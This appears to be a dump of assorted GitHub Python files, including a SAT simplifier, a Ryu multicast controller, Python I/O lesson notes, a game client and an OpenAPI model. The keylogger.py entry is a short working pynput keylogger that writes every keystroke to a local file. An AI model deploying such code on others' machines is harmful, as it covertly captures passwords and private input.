blob_id | directory_id | path | content_id | detected_licenses | license_type | repo_name | snapshot_id | revision_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_event_created_at | gha_created_at | gha_language | src_encoding | language | is_vendor | is_generated | length_bytes | extension | content | authors | author
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6753869010cb851c1e63bd77404c56ed1fb3e184 | 00ccbf6a98b237e19a375cb47cba5eca876f567b | /venv/Scripts/pip-script.py | 64d606b8423306a2824c612d6d15a3f5f030cc34 | [] | no_license | emaillalkrishna/23May2019_list_problems1 | 5756a5298c4493a3b6733dd9fcbb0d32808db86a | 00bc0278d5fe4e4d0d35535025e244bb2b41bd48 | refs/heads/master | 2020-05-31T23:02:21.486866 | 2019-06-06T07:00:06 | 2019-06-06T07:00:06 | 190,531,108 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | #!"C:\Users\LAL KRISHNA\PycharmProjects\23May2019\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
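# load_entry_point() looks up the callable registered under the
# 'console_scripts' group as 'pip' in the pip==19.0.3 distribution metadata
# and returns it, so the call below runs pip's command-line interface.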
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
9084390ce15e1db9beffaeeed2599d54bd5bd7ae | 4e8501c2f9ae1676e0bc1cfd22bb2e3c6993fc0d | /keylogger.py | 7c4f886fb6fd049cc4f6d6917ddf20e386d5527f | [] | no_license | svsaurabh/python-starter-1 | 1c5d616d8cefd2bcb6e6a33b7f4062554a4ab13c | 49c29dd41f27ac95a182ec5315ef7bee5feaa62a | refs/heads/master | 2022-12-28T07:59:48.959838 | 2020-10-04T16:51:27 | 2020-10-04T16:51:27 | 300,824,844 | 0 | 1 | null | 2020-10-04T16:51:28 | 2020-10-03T07:41:54 | Python | UTF-8 | Python | false | false | 399 | py | import pynput
print('Running keylogger')
from pynput.keyboard import Key, Listener
import logging

log_dir = r"./"
# log every keystroke with a timestamp to keyLog.txt
logging.basicConfig(filename=(log_dir + "keyLog.txt"), level=logging.INFO,
                    format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
    if str(key) == '\'`\'':  # pressing the backtick key stops the logger
print("exit")
exit()
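
# Example keyLog.txt lines this handler produces (the timestamp format is the
# logging module's default; the key reprs come from pynput, e.g. 'a' or
# Key.space — illustrative values only):
# 2020-10-04 16:51:27,123: 'a'
# 2020-10-04 16:51:28,456: Key.space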
with Listener(on_press=on_press) as listener:
listener.join() | [
"[email protected]"
] | |
8fd6dbb11687301fb31010e9818688c5aec48162 | 1c91ea9dd939c26134d95ce0c80c450ee958de1b | /scripts/divide_sub_images_train.py | 8cc63952de98d8b2f5839b34469e48443fe92db8 | [] | no_license | Scallions/ClassSR_paddle | ed73b1b420ad9b129ba9c3a050fe7e2bb2ba5a80 | 6f7648c7507f423e54455482f85d363f6b5ed9e7 | refs/heads/main | 2023-08-31T01:44:04.059381 | 2021-09-29T08:42:05 | 2021-09-29T08:42:05 | 399,377,609 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py |
import os.path as osp
import os
import shutil

# divide the training data into three classes by PSNR
LR_folder="dataset/DIV2K_scale_sub/LR"
GT_folder="dataset/DIV2K_scale_sub/GT"
save_list=["dataset/DIV2K_scale_sub_psnr_LR_class3",
"dataset/DIV2K_scale_sub_psnr_LR_class2",
"dataset/DIV2K_scale_sub_psnr_LR_class1",
"dataset/DIV2K_scale_sub_psnr_GT_class3",
"dataset/DIV2K_scale_sub_psnr_GT_class2",
"dataset/DIV2K_scale_sub_psnr_GT_class1"]
for i in save_list:
    os.makedirs(i, exist_ok=True)  # create each output folder if missing
threshold=[27.16882,35.149761]
#f1 = open("/data0/xtkong/ClassSR-github/codes/data_scripts/divide_val.log")
f1 = open("scripts/divide_train.log")
a1 = f1.readlines()
index=0
for i in a1:
index+=1
print(index)
if ('- PSNR:' in i and 'INFO:' in i) and ('results' not in i):
psnr=float(i.split('PSNR: ')[1].split(' dB')[0])
filename=i.split('INFO: ')[1].split(' ')[0]
filename=filename+".png"
print(filename,psnr)
if psnr < threshold[0]:
shutil.copy(osp.join(LR_folder, filename), osp.join(save_list[0], filename))
shutil.copy(osp.join(GT_folder, filename), osp.join(save_list[3], filename))
if psnr >= threshold[0] and psnr < threshold[1]:
shutil.copy(osp.join(LR_folder, filename), osp.join(save_list[1], filename))
shutil.copy(osp.join(GT_folder, filename), osp.join(save_list[4], filename))
if psnr >= threshold[1]:
shutil.copy(osp.join(LR_folder, filename), osp.join(save_list[2], filename))
shutil.copy(osp.join(GT_folder, filename), osp.join(save_list[5], filename))
f1.close()
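# A divide_train.log line this parser accepts looks roughly like the
# following (a hypothetical example inferred from the split() calls above):
#   21-01-01 00:00:00 INFO: 0801_s001 - PSNR: 28.1331 dB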
| [
"[email protected]"
] | |
d39191f4401b7166c7a514ce37a1c1855eada830 | 32ff89ba0cade19a291557c7f002613632a35fc9 | /Lektion_1_Einfuehrung_in_Python/1_5_Eingabe_Ausgabe.py | 2917781b3104a6d5b59b34182417badb3b2f225b | [] | no_license | iubh/DLMDWPMP01 | 749f3fad456e97fd6355b0f4758ecc69b194c0ba | 520eb91111f516feb4532d2001569000fe7be9b8 | refs/heads/main | 2023-04-30T02:51:09.897270 | 2021-04-28T18:38:01 | 2021-04-28T18:38:01 | 358,973,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,570 | py | # IU - Internationale Hochschule
# Programming with Python
# Course Code: DLMDWPMP01
# Input / Output
#%%
# Prompt for keyboard input
user_input = input("Wie heißt du?")
#%%
# Print the input
print("Hallo, {}!".format(user_input))
# console output: Hallo, Christian!
#%%
# Open a file in read mode
my_file = open("myTextData.txt", "r")
# Read the file's content and store it in an object
my_file_content = my_file.read()
# Close the file
my_file.close()
# Print the content that was stored in the object
print(my_file_content)
# console output:
# Strange women lying in ponds,
# distributing swords,
# is no basis for a
# system of government!
#%%
# Open a file safely (the with block closes it automatically)
with open("myTextData.txt", "r") as my_file:
    # Read the file's content and store it in an object
    my_file_content = my_file.read()
#%%
with open("myTextData.txt", "r") as my_file:
    # Iterate over each line of the file
for cur_line in my_file:
print("This line: {}".format(cur_line))
# console output:
# This line: Strange women lying in ponds,
# This line: distributing swords,
# This line: is no basis for a
# This line: system of government!
#%%
with open("myTextData.txt", "r") as my_file:
my_line = my_file.readline()
print(my_line)
# console output: Strange women lying in ponds,
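#%%
# Additional example (not part of the original notes): each readline() call
# returns the next line of the file.
with open("myTextData.txt", "r") as my_file:
    my_first_line = my_file.readline()
    my_second_line = my_file.readline()
    print(my_second_line)
# console output: distributing swords,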
#%%
with open("myTextData.txt", "r") as my_file:
my_lines = my_file.readlines()
print(my_lines[3])
# console output: system of government!
#%%
with open("myNewTextData.txt", "w") as my_file:
my_file.write("blessed are the cheesemakers.") | [
"[email protected]"
] | |
69c617a2bab0935fa411eece5a5fb0c52ac0adb2 | 95ad751d88996ab5270c36614d5a0ff2296cf94f | /flask_portfolio/server.py | 2cf20ab15059989628be847f5543fbbf2d8f8162 | [] | no_license | Ash25x/PythonClass | a8a738fdac36365eb19749b5cda3b26ed92e6e29 | bd4351bdcaa69b88e92d9a683bf8f10683e7292f | refs/heads/master | 2021-08-08T22:39:01.575813 | 2017-11-11T13:42:12 | 2017-11-11T13:42:12 | 102,967,067 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | # from flask import Flask, render_template, request
from portfolio import app
# app = Flask('portfolio')
#
# from . import views
if __name__ == '__main__':
    app.run(debug=True, host='localhost', port=5555)
| [
"[email protected]"
] | |
24b2966bd1b8fd90c90bf5ecbc25ffa51ea5a07c | e739dd9f35856cddabcf486080c189764cb98b4a | /simplification.py | b5012eab0e905c0ea56ef95b6ebf66fb746c849e | [] | no_license | sebkeil/KR-Project01-Group02 | e8a6e7c40fa40852ac360f511dbc0e9a52fb89b4 | a2dd69909894e94b0ccef79e3834ebdaa4523260 | refs/heads/master | 2022-12-28T04:46:54.108524 | 2020-09-23T13:23:09 | 2020-09-23T13:23:09 | 293,752,390 | 0 | 0 | null | 2020-09-22T08:20:58 | 2020-09-08T08:44:03 | Python | UTF-8 | Python | false | false | 3,191 | py | def tautology(clauses):
    # drop every clause that contains both a literal and its negation
    return [literals for literals in clauses
            if not any(-lit in literals for lit in literals)]
def pure_literals(clauses, varbs, assigns):
for literals in clauses:
for lit in literals:
if -lit not in varbs and lit not in assigns:
assigns.append(lit)
return assigns
def unit_clauses(clauses, assigns, validity_check):
varbs = []
for literals in clauses:
if len(literals) == 1:
item = literals[0]
varbs.append(item)
for items in varbs:
if -items in varbs or -items in assigns:
validity_check = False
return validity_check
def true_clauses(clauses, assigns, validity_check):
if validity_check:
rem_clauses = []
for literals in clauses:
if any(item in literals for item in assigns):
rem_clauses.append(literals)
for rc in rem_clauses:
clauses.remove(rc)
return clauses
def val_check(clauses, validity_check, assigns):
varbs = []
for literals in clauses:
#check for empty clauses
if not literals:
validity_check = False
# check for unit literals
if len(literals) == 1:
varbs.append(literals[0])
# if pos and neg variables occur together, then false
for items in varbs:
if -items in varbs or -items in assigns:
validity_check = False
return validity_check
def shorten_clause(clauses, assigns, validity_check):
if validity_check:
for literals in clauses:
keep_lits = []
if len(literals) > 1:
for lit in literals:
if -lit not in assigns:
keep_lits.append(lit)
if keep_lits:
new_clause = [liters for liters in keep_lits]
else:
new_clause = []
clauses[clauses.index(literals)] = new_clause
return clauses
def unit_propagation(variables, clauses, assmts, units):
clauses.sort(key=len)
n = 0
while n < len(clauses) and len(clauses[n]) == 1:
literals = clauses[n]
if literals[0] not in assmts and -literals[0] not in assmts:
assmts.append(literals[0])
units.append(literals[0])
n += 1
return variables, assmts
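# Usage sketch for simplify() below (a comment-only example; clauses are
# lists of signed integer literals, e.g. 3 means x3 and -3 means NOT x3):
#   clauses, assigns, valid = simplify([[1], [-1, 2]], [1], True)
#   # -> ([[2]], [1], True): x1=True satisfies [1] and shortens [-1, 2] to [2]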
# function to simplify CNF with assignments and rules
def simplify(clauses, assigns, validity_check):
# assign values to pure literals, can be left out: computationally expensive
#assigns = pure_literals(clauses, varb, assigns)
# shorten clauses
clauses1 = shorten_clause(clauses, assigns, validity_check)
if validity_check:
validity_check = val_check(clauses1, validity_check, assigns)
# remove true clauses
clauses2 = true_clauses(clauses1, assigns, validity_check)
validity_check = val_check(clauses, validity_check, assigns)
return clauses2, assigns, validity_check | [
"[email protected]"
] | |
402d7a1852a0d8a57dc65c63a3f34db7c6ca1971 | b2a6a8733f588d503e45ad40cfa2080566d1ccf5 | /0x03-python-data_structures/1-element_at.py | 8f497c59322f19e6d0dee0f2531c52f578530d68 | [] | no_license | andresvanegas19/holbertonschool-higher_level_programming | 9cd0f83722623ca08c6b4e3aa94975363b569183 | aa967a51183c3c8b9c9b27b47199c70fd6241485 | refs/heads/master | 2022-12-22T18:44:17.839861 | 2020-09-25T04:54:18 | 2020-09-25T04:54:18 | 259,396,114 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | #!/usr/bin/python3
def element_at(my_list, idx):
if ((idx < 0) or (idx >= len(my_list))):
return (None)
else:
return (my_list[idx])
| [
"[email protected]"
] | |
e7eeffd8a0307e45d5b6830ad3f4623fcb990224 | 98b4aeadab444eaf6f0d5b469c199e6d24a52f7f | /step10/10870.py | 795ad4473e8f0f5778763c6555ea8321bc472a36 | [] | no_license | kwr0113/BOJ_Python | 7a9dc050bb3bb42ae2b03671c5d6fa76cc0d6d99 | 27bafdaafc44115f55f0b058829cb36b8c79469a | refs/heads/master | 2023-06-10T23:22:20.639613 | 2021-06-25T07:25:53 | 2021-06-25T07:25:53 | 328,057,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | # 10870.py
def fibo(x):
if x == 0:
return 0
elif x == 1:
return 1
else:
return fibo(x-1) + fibo(x-2)
x = int(input())
print(fibo(x)) | [
"[email protected]"
] | |
20379467d53a3638ad96f609d78ae89ee19c7efe | cfefcd99016a908df2584896845406942097671d | /python/nucoro_api/model/asset_category.py | ccee0ee7f9cbf74b20befbf1984419fa32be2c0a | [] | no_license | tomasgarzon/vigilant-guacamole | 982a8c7cb0a8193bb3409014b447ad8a70e6eb36 | bde73674cf0461e2fcdfce5074bf9d93a47227f7 | refs/heads/main | 2023-08-17T01:51:27.168440 | 2021-09-01T11:23:46 | 2021-09-01T11:23:46 | 398,827,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,971 | py | """
Nucoro API
No description # noqa: E501
The version of the OpenAPI document: 4.175.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from nucoro_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from nucoro_api.exceptions import ApiAttributeError
class AssetCategory(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
('name',): {
'max_length': 150,
},
('code',): {
'max_length': 50,
},
('order',): {
'inclusive_maximum': 32767,
'inclusive_minimum': 0,
},
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'uuid': (str,), # noqa: E501
'name': (str,), # noqa: E501
'code': (str,), # noqa: E501
'order': (int,), # noqa: E501
'type': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'uuid': 'uuid', # noqa: E501
'name': 'name', # noqa: E501
'code': 'code', # noqa: E501
'order': 'order', # noqa: E501
'type': 'type', # noqa: E501
}
read_only_vars = {
'uuid', # noqa: E501
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, uuid, name, code, order, type, *args, **kwargs): # noqa: E501
"""AssetCategory - a model defined in OpenAPI
Args:
uuid (str):
name (str):
code (str):
order (int):
type (str):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.uuid = uuid
self.name = name
self.code = code
self.order = order
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, name, code, order, type, *args, **kwargs): # noqa: E501
"""AssetCategory - a model defined in OpenAPI
name (str):
code (str):
order (int):
type (str):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.name = name
self.code = code
self.order = order
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| [
"[email protected]"
] | |
ee61c291d36a5a578ed0572b97be434e2acab471 | 9baa52b6204e2c3fccb71679178442bca0a90bbe | /client/src/gamelib/client.py | 7b631927b4135f5ad33fc5f90e9247b30437f39b | [] | no_license | brunez/m-reborn | bec34f57b4e229a5733bbd1db2fe543021e8719a | 3b0f56b03190e714fdc55d420ca0f0630fa454d1 | refs/heads/master | 2023-02-08T18:20:15.125457 | 2023-01-30T19:40:07 | 2023-01-30T19:40:07 | 52,682,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,342 | py |
import socket
import pickle
import network
import game
class Client:
def __init__(self, server_ip, server_port, menu, host=False):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setblocking(0)
# server_ip = "138.100.154.236"
self.serv_addr = server_ip, server_port
self.menu = menu
self.isHost = host
self.game = None
def close(self):
self.socket.close()
def send(self, data):
# print "Sending ", data
pickled = pickle.dumps(data)
self.socket.sendto(pickled, self.serv_addr)
# print "Sent" + data + " to " + str(self.serv_addr)
def set_game(self, game):
self.game = game
#TODO BIG TODO Use split for string analysis
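    # String messages receive() parses below (formats inferred from the
    # slicing, so treat the exact separators as assumptions):
    #   "id:N", "start:M:level_name", "act:...",
    #   "hit:<source_id>:<side>:<target_id>", "lost:<detail>", "stop"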
def receive(self):
while True:
try:
data, addr = self.socket.recvfrom(4096)
# print "Client Got " , str(data) ," of type " , str(type(data))
data = pickle.loads(data)
#Lists we can receive:
# players: A list of network.Avatars representing the players
# game_state: A list of objects?? sprites?? representing the game state
if isinstance(data, list):
if data[0] == "players":
data = data[1:]
# print "Received players: ", data
self.menu.set_game_info(data)
#The first sync messages can get here before the client
#is done constructing, so we check if the game is assigned, just in case
elif data[0] == "sync" and self.game != None:
self.game.synchronize(data)
elif data[0] == 'ply_sync' and self.game != None:
self.game.synchronize_players(data)
if data[:2] == "id":
if not self.isHost:
self.menu.set_id(int(data[3]))
self.menu.set_connected(True)
if data[:5] == "start":
mode = int(data[6:7])
level_name = data[8:]
self.menu.set_mode(mode)
self.menu.set_ready(True)
self.menu.set_level_name(level_name)
if data[:3] == "act":
#action_id = int(data[4])
self.game.pay_heed(data)
elif data[:3] == "hit":
data = data[data.index(":")+1:]
source_id = int(data[:data.index(":")])
data = data[data.index(":")+1:]
side = int(data[:data.index(":")])
data = data[data.index(":")+1:]
target_id = int(data)
self.game.note_collision(source_id, side, target_id)
elif data[:4] == "lost":
self.game.lose(data[5:])
elif data[:4] == "stop":
self.game.notify_server_stopped()
except socket.error:
break
| [
"[email protected]"
] | |
9deb4d50553b21ded4b05d6b3cb6d8011f610422 | bf44694f814ab2ed3d930cc9785cda8cb8e363ef | /mswitching-hub.py | 4c5e7ff1df5aac81cc8559a360fa62a7ed61e4ee | [] | no_license | jakio6/ryu-multicast-try | 4c5e7ff1df5aac81cc8559a360fa62a7ed61e4ee | 37d72cf754fe7af3ee6565f2f2a67821f995f713 | refs/heads/master | 2023-03-19T01:28:43.315727 | 2021-03-18T14:42:51 | 2021-03-18T14:42:51 | 318,971,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,595 | py | # Clone of the switching hub from the Ryu book. Getting familiar with it, while looking at the original code as little as possible.
import logging
# First, which libraries are needed? Worked out without looking at the concrete
# code or the Ryu book; the OpenFlow part can of course be used as a reference.
from ryu.base import app_manager
# ryu.controller.controller : the main component of OpenFlow controller.
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER # dispatcher
from ryu.controller.handler import CONFIG_DISPATCHER
from ryu.controller.handler import set_ev_cls # listening for a given event
from ryu.ofproto import ofproto_v1_3 # open flow protocol
# from ryu.topology import event, switches
# from ryu.topology.api import get_switch, get_link
from igmplib import IgmpLib
from igmplib import EventPacketIn
from ryu.ofproto import inet
from ryu.ofproto import ether
import ryu.app.ofctl.api as ofctl_api
from json import load
LOG = logging.getLogger(__name__)
class L2Switch(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {
'migmplib': IgmpLib,
}
def __init__(self, *args, **kwargs):
        super(L2Switch, self).__init__(*args, **kwargs)
# self.topo = *kwargs['topology']
# self.topo = {
# 1: {1: 2, 2: 3},
# 2: {3: 1, 1: 'host', 2: 'host'},
# 3: {3: 1, 1: 'host', 2: 'host'},
# }
topo = {}
with open('topo.json') as f:
_topo = load(f)
assert _topo
for k, v in _topo.items():
sw = topo.setdefault(int(k), {})
for kk, vv in v.items():
sw.setdefault(int(kk), vv)
self._igmp = kwargs['migmplib']
self._dpid_to_datapath = {}
self._igmp.set_topology(topo)
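        # Example topo.json this constructor expects (an assumption that
        # mirrors the commented-out topology above; JSON object keys are
        # strings and are converted to ints by the loop above):
        # {"1": {"1": 2, "2": 3},
        #  "2": {"3": 1, "1": "host", "2": "host"},
        #  "3": {"3": 1, "1": "host", "2": "host"}}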
def manual_flood(self, dp, data):
"""
send a message to all ports of a datapath
"""
ofp = dp.ofproto
ofp_parser = dp.ofproto_parser
buffer_id = ofp.OFP_NO_BUFFER # None
in_port = ofp.OFPP_CONTROLLER # None
# flooding
actions = [ofp_parser.OFPActionOutput(ofp.OFPP_FLOOD)]
req = ofp_parser.OFPPacketOut(dp, buffer_id, in_port, actions, data)
dp.send_msg(req)
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
LOG.info("Switch feather: %d", datapath.id)
# install the table-miss flow entry.
match = parser.OFPMatch()
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions)
def add_flow(self, datapath, priority, match, actions):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
# construct flow_mod message and send it.
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst)
datapath.send_msg(mod)
@set_ev_cls(EventPacketIn)
def packet_in_handler(self, ev):
        msg = ev.msg # message carried with the event; see the related pages for its content
datapath = msg.datapath
# reason = msg.reason
data = msg.data
LOG.debug('packet in')
# self.manual_flood(datapath, data)
| [
"[email protected]"
] | |
e381eb7c7c4e70aa1df7df9890dae40a64d7d34a | d1955b0a26a2c1b26e7f74ed0f15c62a9aad0895 | /ConjunctionOrder.py | edb403ff0dac496e0bbc11f8dc6815d23f68c1d0 | [] | no_license | kimu3-slime/Linguistics | 4b036c1f3f9f83fde3c66030ea4a802ea4a0235f | a803addf426b30dab36a1c7f309f410bbfbe1315 | refs/heads/master | 2020-05-16T21:27:19.176611 | 2015-01-06T09:03:12 | 2015-01-06T09:03:12 | 28,481,358 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,526 | py | # coding: UTF-8
import nltk  # set up language processing
from nltk.book import *
from nltk.corpus import brown
import itertools
conj = ['after', 'although', 'as', 'because', 'before', 'if', 'since', 'so', 'than', 'though', 'unless', 'until', 'when', 'whenever', 'where', 'whereas', 'wherever', 'while']  # the conjunctions to extract
text = brown.words()  # use the Brown corpus
tcon = [w.lower() for w in text if w.lower() in conj]  # extract only the conjunctions from the Brown corpus
fdist_tcon = FreqDist(tcon)  # frequency distribution of the conjunctions
Conj = [w for w, _ in fdist_tcon.most_common(4)]  # the four most frequent conjunctions (Python 3: FreqDist keys can no longer be sliced)
def bimake(tuple):  # given a conjunction pair (B, C), build the data [[B, C], [C, B]]
    return (tuple, tuple[::-1])
def TCon(con):  # convert a conjunction-pair datum into a frequency
    tcon = [w.lower() for w in text if w in Conj]
    fdist = FreqDist(bigrams(tcon))  # frequency distribution of conjunction pairs
    print(fdist[con])  # show the frequency
    return fdist[con]  # return the frequency
def a(b, c):  # define the order score a(b, c), computed from the frequencies b and c
    print(100.0 * abs(b - c) / (b + c))
def d(bituple):  # take the frequencies b, c from the [[B, C], [C, B]] data and compute the order score
    a(TCon(bituple[0]), TCon(bituple[1]))
for v in [w for w in itertools.combinations(Conj, 2)]:  # take each conjunction pair from Conj
    print(v, end=' ')  # show the conjunction pair B, C
    d(bimake(v))  # show the frequency of [B, C], of [C, B], and the order score a | [
"[email protected]"
] | |
62a22725e183f5e8563dde5f9d0142120188d1a0 | 797960bfb316c91825a8e8493a27f1121e2e895d | /FPN_model.py | 5afa440e051c3e40ca5cc3ff9c03cbf5b5c12a55 | [] | no_license | divyakraman/Pyramid-DRN-A-case-study-on-category-wise-semantic-segmentation-of-real-urban-scenes | 874c2cad24d9043f7d416f7673f11ac5cbd6a0bc | d6a5367d2be7eb87a0b86bda48222dadb56148b8 | refs/heads/master | 2020-07-05T04:38:32.133210 | 2020-01-26T14:26:10 | 2020-01-26T14:26:10 | 202,524,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,182 | py | import numpy as np
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import math
from GCN_BR import GCN,BR
#import matplotlib.pyplot as plt
#import scipy.misc as smisc
#import random
class FPN(nn.Module):
def __init__(self):
super(FPN, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3,out_channels=32,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv4 = nn.Conv2d(in_channels=32,out_channels=32,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.down1 = nn.Conv2d(in_channels=32,out_channels=32,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv1_bn = nn.BatchNorm2d(32)
self.conv2 = nn.Conv2d(in_channels=32,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv5 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.down2 = nn.Conv2d(in_channels=64,out_channels=64,kernel_size=4,stride=2,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
self.conv2_bn = nn.BatchNorm2d(64)
self.conv3 = nn.Conv2d(in_channels=64,out_channels=128,kernel_size=3,stride=1,padding=1,dilation=1,groups=1,bias=True,padding_mode='zeros')
